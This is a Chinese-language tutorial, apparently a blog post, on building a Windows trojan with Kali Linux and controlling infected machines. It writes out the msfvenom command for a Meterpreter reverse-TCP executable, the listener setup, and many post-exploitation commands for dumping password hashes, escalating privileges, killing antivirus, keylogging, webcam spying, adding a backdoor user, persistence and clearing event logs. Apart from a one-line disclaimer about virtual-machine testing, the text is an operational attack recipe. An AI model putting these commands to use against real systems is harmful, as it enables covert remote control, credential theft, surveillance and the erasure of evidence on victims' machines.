Kali生成windows木马程序
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
一、生成windows执行木马程序
-p windows/x64/meterpreter/reverse_tcp //载入64位payload攻击载荷,如需32位把x64去掉即可
lhost=192.168.2.129 //设置本机kali的IP地址
lport=6666 //设置一个监听端口,可以随意,未被占用即可
-f exe //定义此文件的类型为exe
-o /home/mm.exe //生成木马程序到home目录下且命名为mm.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f exe -o /home/mm.exe
二、进入msfconsole进行监听目标上线
msfconsole //进入框架
use exploit/multi/handler //载入模块
set payload windows/meterpreter/reverse_tcp //加载攻击负载核
set lhost 192.168.2.129 //设置本地监听地址,和生成的木马地址一致
set lport 6666 //设置本地监听端口,和生成的木马地址一致
run / exploit //开始执行,等待目标上线
三、目标运行木马
当目标运行该木马程序,kali监听成功就会变成meterpreter
四、后渗透
Post后渗透模块
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev #清除日志
本章内容就讲解如上,更多的内容需要自行深入研究。
Kali生成windows木马程序相关推荐
- MSF生成windows木马
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom ...
- 2021-12-09 使用kali生成木马,渗透Windows系统
本文章仅供学习和参考! 欢迎交流~ 目录 一.实验题目:使用kali生成木马,渗透Windows系统 二.实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三.实验环境 ...
- VS2010 win32项目windows窗体程序 向导生成代码解析
目录: 1.Win32项目的windows窗体程序的向导生成了如下代码 2.手工生成代码如下 3.当消息队列中没有消息需要处理,我们可以利用这段时间处理我们自己的任务 1.Win32项目的window ...
- nc扫描端口-curl-手动查杀木马过程之生成木马程序病原体并自动运行
实验环境 RHEL6 本节所讲内容: 22.1 使用nc扫描端口 22.2 curl 查看web服务器类型 22.3 手动查杀木马过程之生成木马程序病原体 22.4 手动查杀木马过程之让木马程序自动运 ...
- 手机android.sys木马,使用kali生成木马入侵安卓手机
大家好,我是T0reAd 今天给大家带来的是使用kali生成 行动开始 先查看kali的ip,我的是1.114 然后输入命令:msfvenom -p android/meterpreter/rever ...
- python 打卡程序_python获取微信企业号打卡数据并生成windows计划任务
由于公司的系统用的是Java版本,开通了企业号打卡之后又没有预算让供应商做数据对接,所以只能自己捣鼓这个,以下是个人设置的一些内容,仅供大家参考 安装python python的安装,这里就不详细写了 ...
- Windows系统中防止病毒木马程序的几种方式
Windows系统中防止病毒木马程序的几种方法 1. BIOS防病毒入侵 在开机时,按F2或F8键进入BIOS,Advanced BIOS Features–>Virus Warning–> ...
- msfconsole之制作windows木马并成功获取shell
msfconsole之制作windows木马并成功获取shell 一.工具简介 msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一 ...
- kali metasploit 制作后门程序远程操控基本使用方法
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_t ...
最新文章
- Centos7.4安装kvm虚拟机(使用virt-manager管理)
- latex写文章的一些细节问题
- Android应用apk的程序签名详解
- 4修改初始值_Java基础篇4——循环
- mysql通过data目录恢复数据库
- (1-e^(-j5w))/(1-e^(-jw))=e^(-j2w)*sin(5w/2)/sin(w/2)的证明过程
- list c++template
- java项目_好程序员Java分享从入门到服务端项目开发的过程
- Mosquito的优化——其他优化(九)
- c++类的成员函数作回调函数为啥要声明为static的
- IS-IS快速收敛调优(二)——链路故障检测、LSP智能定时器和SPF智能定时器
- 发现有的时候,EBS会报连接数不足的问题
- 服务器cpu和普通cpu性能,服务器cpu排行(为什么服务器cpu不适合家用)
- 用 LSTM 预测股票价格
- TouchBar Dino for mac(TouchBar上的小恐龙跑酷游戏)
- 最新pycharm安装教程
- pure-admin九州权限系统地址简单读
- 体验篇之联动云租车体验[一日租车]
- 2021年最新版Web前端学习路线图-前端小白入门必读-推荐
- 发现一个推特前端替代网站,可以直接浏览推特用户发布的内容。